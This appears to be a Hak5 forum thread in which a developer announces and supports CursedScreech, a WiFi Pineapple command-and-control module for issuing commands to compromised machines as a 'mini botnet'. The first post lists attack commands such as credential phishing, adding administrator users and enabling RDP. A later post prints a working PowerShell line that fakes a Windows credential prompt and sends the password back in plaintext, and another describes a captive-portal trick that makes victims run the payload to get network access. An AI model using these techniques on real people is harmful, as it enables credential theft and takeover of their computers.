Jump to content
Hak5 Forums
sud0nick

[Official] CursedScreech

Recommended Posts

Edit: A test version First major release is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there.

I started working on a new module and I'll keep this thread up to date as I work on it. I'm much farther along with it than I thought I would be at this point so hopefully it won't be too long before it's initial release.

Purpose:

• Securely control compromised systems on the network by sending commands to them all at once, one at a time, or to a custom group.

Features:

• Commands sent via TLS (level negotiated by systems; highest available is chosen)

• Execute shell commands on all targets at once or those selected and receive responses individually.

• Store commands for quick reuse.

• Utilize the Certificate Store in Papers for TLS keys.

• Multi-threaded python scripts that listen for compromised systems on the network and do your bidding.

This is an advanced module that will require some programming knowledge (not to use the module itself but for payloads that are required). I plan on including a small API that you can import into your payload so it will work seamlessly with CursedScreech.

ChPsQt8.png

Default EZ Commands are as follows:

  • Get PS Version
  • Get SysInfo
  • Windows PSv3+ Phish
  • Windows PSv2- Phish
  • Windows Alert
  • Logoff User
  • Restart
  • Shutdown
  • Add User
  • Change User Password
  • Delete User
  • Enable RDP
  • Add User to Remote Desktop Users Group
  • Add User to Administrators Group

US0rFya.png

And a video tutorial

Edited by sud0nick
  • Upvote 3

Share this post


Link to post
Share on other sites

Since I've had a lot of time on my hands I've made some good progress with this module. Still not complete but here are a couple screenshots of the types of attacks you'll be able to perform with it.

In this first image I issued a PowerShell command to one of my targets (which was the same system I was using) which prompted for credentials using a PSCredential object. This particular command decodes the password and sends it back in plaintext with the username (no worries though cus it's over TLS 1.2).

Command Issued:

powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"

lmnkmri.png

Then I issued

powershell "Get-Process"

just to add more content to the example. Here is the screenshot of the returned data.

3J5r3Bm.png

I hope to have an initial release on GitHub by next week. I probably won't release to the Module Manager until I get an API developed for payloads to use with this module.

  • Upvote 1

Share this post


Link to post
Share on other sites

What does your agent look like that sits on the compromised pc? Will it not really matter what the agent is as long as it implements the API to talk back to the module?

I can see this as being a universal C&C panel that can control any agent on a machine that decides to implement the interface you will expose through the API.

Share this post


Link to post
Share on other sites

What does your agent look like that sits on the compromised pc?

Right now I have two custom programs, one written in C# and the other in Python. I prefer C# since I can compile everything into a single executable (even the certificates) but I know not everyone is comfortable with C#.

Will it not really matter what the agent is as long as it implements the API to talk back to the module?

That's the idea. The way I plan on implementing this is to first write two separate libraries (one for C# and one for Python) and include them with the module. Each time the settings of the module are modified the library code will be updated to match these settings. Then you'll be presented with the option to download the updated libraries so they can easily be imported into your projects. Any time you modify the settings you'll need to download and re-import the library unless if you know which settings in the code to modify (which is honestly only a couple variables and will be super simple).

The main goal is to be able to push commands out to all compromised systems on the network no matter how you choose to compromise those machines, similar to a mini botnet. I will implement stored commands that can be issued as keywords and translate into system commands (similar to how Foxtrot did with his module, Commander). So, for instance, you could shut down all machines on the network at once, phish for all of their passwords, or select just a few of them to target. There's still a lot to be done in making this module more user friendly but as you can see from the pictures in my last post the backend is functional. I'll be sure to do a video demonstrating all features and how to implement the API in your own code before I release it.

  • Upvote 1

Share this post


Link to post
Share on other sites

Wow sud0nick! Great moves! keep it up! proud of you!

Edited by ale
  • Like 1
  • Upvote 1

Share this post


Link to post
Share on other sites

Pretty cool! I myself also prefer C# over python.. but had to learn some python since getting the pineapples.

Looking forward to this!

  • Upvote 1

Share this post


Link to post
Share on other sites

Wow sud0nick! Great moves! keep it up! proud of you!

Thanks, ale! I'm really trying to come up with serious hacking tools. I may not have zero days yet but I feel I'm improving.

Pretty cool! I myself also prefer C# over python.. but had to learn some python since getting the pineapples.

Looking forward to this!

I prefer the result of C# (self-contained .exe) but I still think Python is much easier to implement :grin: . I think setting next week as an initial release time was a little ambitious of me. I'm definitely making a lot of progress but I'm new to writing APIs. I'm working on the C# one now but I have a feeling it's going to take a bit of testing. Here is my todo list in order of execution:

  1. Finish C# API
  2. Write equivalent Python library
  3. Put finishing touches on web interface
  4. Test, Test, Test
  5. Create documentation and video guide
  6. Release on Module Manager

I'll update this post by crossing things off the list as I finish them.

Edit:

A test version is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there.

Edited by sud0nick
  • Upvote 1

Share this post


Link to post
Share on other sites

The first major release of CursedScreech is on GitHub (link in the first post). I have performed a lot of tests and tweaked many things over the last few days. I won't submit it to the module manager until I get a video made for it but I will hopefully have that done by the end of the weekend.

A couple things to keep in mind:

  1. This module can only be used on the TETRA for now. I believe there are some underlying SSL problems on the NANO that still haven't been resolved and TLS/SSL is required for this module (see below for more).
  2. Python takes a few seconds to load for some reason. I've submitted an official bug report with results from a test python script that showed it takes about 7 seconds just for Python to start up. Because of this, be patient when starting Kuro. It will let you know when it's connecting, when a connection to a target has been established, and when it's ready for you to start entering commands.

I've put quite a bit of effort into this module so I hope you all find it very useful. For those that only use a NANO,and won't be able to use this module, I plan on porting this to a Linux utility so you can still use it in your pentests just without the pretty front end. Please download a copy from GitHub, test it out, and report any issues here. If there is anything to fix I will make sure it happens before I submit it to the module manager.

Edit:

v1 has been submitted to the module manager.

Edited by sud0nick
  • Upvote 3

Share this post


Link to post
Share on other sites
Hi sud0nick! your module seems amazing!! but i have some problems:

I follow all your instructions of the video to create the payload but when i execute it says "payload has stopped working" i tried in w10 x64 and a virtual machine with w7 ultimate x32 with the tetra 1.0.2.


I used settings by default in the module and create the certificates with the Papers module. Created not encrypted keys for Kuro. And used Export keys to PKCS#12 container for Target.


Please help me.

Share this post


Link to post
Share on other sites

Do you mean the payload stops working on the target? It should work by default on win 10 but maybe in win 7 it needs an upgraded version of .NET? Could you give more details?

Share this post


Link to post
Share on other sites

Yes stops in the target computer. I pressed the debug button of windows and get redirected to visual studio and shows this.

post-52829-0-51654400-1457676432_thumb.p

Share this post


Link to post
Share on other sites

It looks like your name space is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target.

  • Upvote 1

Share this post


Link to post
Share on other sites

It looks like your name space is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target.

Ok I'll try it and comment the results. Thanks for your help.

Share this post


Link to post
Share on other sites

On second thought it needs to match the name of the solution/project. Don't change the namespace name but change the reference to the keys. It should be payload.Target.pfx

Share this post


Link to post
Share on other sites

I created a new "Payload" (with capital p) now the namespace is equal with the reference keys but still with the same issue.

Share this post


Link to post
Share on other sites

Did you make sure to make the pfx an embedded resource?

What happens if you run the payload within VS? It should show you the line of code that's failing.

  • Upvote 1

Share this post


Link to post
Share on other sites
Ok when i create the new Payload i forgot to put the Target.pfx as an embedded resource, i changed that and now the Payload runs without problems. I sorry for my noob mistakes but i am happy for your help thanks.


When i run the working Payload on a target machine in this case a virtual machine with w7 x32 that is connected to the wifi pineapple network, i start Sein and nothing happens.


So i saw your video again and see that your target ip address is 192.168.1.X so i connect the w7 virtual machine to my home network (where i have the tetra connected via ethernet) and the module works very well.


I am confused about this.

Why the target is not recognised by Sein when is connected to the pineapple network?

Share this post


Link to post
Share on other sites

Hmm, I'll have to check on this.

It seems to work for me. I just tried with the Python payload on my Mac connected on the Pineapple's network and it showed up in Sein.

Edited by sud0nick

Share this post


Link to post
Share on other sites

I've updated the API in this module to include a class that integrates with the Payloader injection set in Portal Auth.  What this means is you can now add authorization to your payloads to force your targets to execute them.  A brief example follows:

• First clone a captive portal with the Payloader injection set
• Build your payload in Cursed Screech by downloading the pre-built payload files and following my video tutorials
• Turn on PASS in Portal Auth
• Attach your payload to your captive portal
• Turn on Evil Portal

When the target reaches your cloned portal they will be prompted to enter an access key which they can receive by downloading and executing your payload.  When they execute the payload, it will reach out to the PASS server in Portal Auth which will generate the access key, store it, and return it to the payload.  The user will enter the key in the captive portal and gain access to the network.  At this point all of the normal CursedScreech stuff will come into play.

This update is only available on my GitHub for now.  The reason for this is I've run into an issue I can't seem to figure out (the same issue the 513RR4 had a few posts above).  When I tested this back in March I couldn't reproduce the problem but months later it seems to be plaguing me.  I need someone else to perform some tests if they have time and let me know if they see their targets appear in the target list.  If you need any help in testing you can ask me or just watch the CursedScreech tutorial video posted at the top of this thread.  The video will walk you through everything.  Once I have this issue figured out I will push an update to the module manager.

Edited by sud0nick

Share this post


Link to post
Share on other sites

Why isnt this module on the NANO?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×